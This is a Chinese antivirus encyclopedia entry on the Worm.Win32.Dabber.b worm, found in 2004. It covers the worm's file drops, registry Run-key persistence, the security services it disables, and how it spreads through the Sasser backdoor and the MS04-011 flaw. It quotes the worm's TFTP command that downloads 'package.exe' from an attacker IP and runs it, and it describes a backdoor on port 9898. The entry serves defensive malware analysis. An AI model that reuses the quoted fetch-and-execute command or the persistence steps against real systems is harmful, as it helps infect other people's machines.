病毒名称:
Worm.Win32.Dabber.b.enc
类别: 蠕虫
病毒资料:
破坏方法:
这是一个通过病毒“震荡波”后门以及微软MS4-011漏洞进行传播的蠕虫病毒
病毒采用c++编写。UPX压缩
一旦执行,病毒将执行下列操作:
1.病毒将创建一个名为:“omgwtfhi2uhaXPlz!!11111!!!111”的互斥量保证只运
行病毒的一个副本
2.病毒将自我复制到如下目录:
%SYSDIR%\package.exe
C:\Documents and Settings\All Users\Start
Menu\Programs\Startup\package.exe
%WINDIR%\All Users\Main menu\Programs\StartUp\package.exe
3.病毒添加:
"sasserfix" = "%System%\package.exe"
到注册表键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
下来使自己能随系统启动
修改如下键值:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
"restrictanonymous" = 1
"restrictanonymoussam" = 1
修改键值:
HKEY_LOCAL_MACHINE\SYSTEM
\CurrentControlSet\Services\SharedAccess
"Start" = 4
这是禁用:“为通过拨号网络连接的家庭网络中所有计算机提供网络地址转换、
定址以及名称解析服务”服务
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc
"Start" = 4
这是禁用这个服务
病毒将从键值:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft
\Windows\CurrentVersion\RunServices
下删除相应的如下值:
Drvddll.exe
Drvddll_exe
drvsys
drvsys.exe
ssgrate
ssgrate.exe
lsasss
lsasss.exe
avserve2.exe
avvserrve32
avserve
Taskmon
Gremlin
Video
Microsoft Update
Windows Drive Compatibility
System Updater Service
等病毒“震荡波”或其它病毒建立的自启动键值
删除如下键值:
LHKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87-00AA005127ED}
\InProcServer32\(Default)
这是微软的“Web Site Monitor”组件
4.病毒将随机扫描端口:5554上的随机IP,寻找系统是否已经感染病毒:“震荡波”,如果已经感染
病毒将使用“震荡波”后门传播病毒到扫描到的系统,如果没有感染“震荡波”,病毒将尝试对端口:
9898进行连接,如果成功则说明已经感染,若不成功病毒将利用Ms4011漏洞对目标系统进行攻击。并利用自己的tFTP服务器将自己复制过去。
病毒使用到的FTP命令为:
tftp -i [攻击者 IP] GET h3110.411 package.exe & package.exe & exit
5.病毒建立后门:
病毒监视9898端口,等待客户端的连接。该后门可以执行一些如:执行文件,从特定网站
下载文件等功能。
病毒的清除法:
使用光华反病毒软件,彻底删除。
病毒演示:
病毒FAQ:
Windows下的PE病毒。
发现日期:
2004-6-15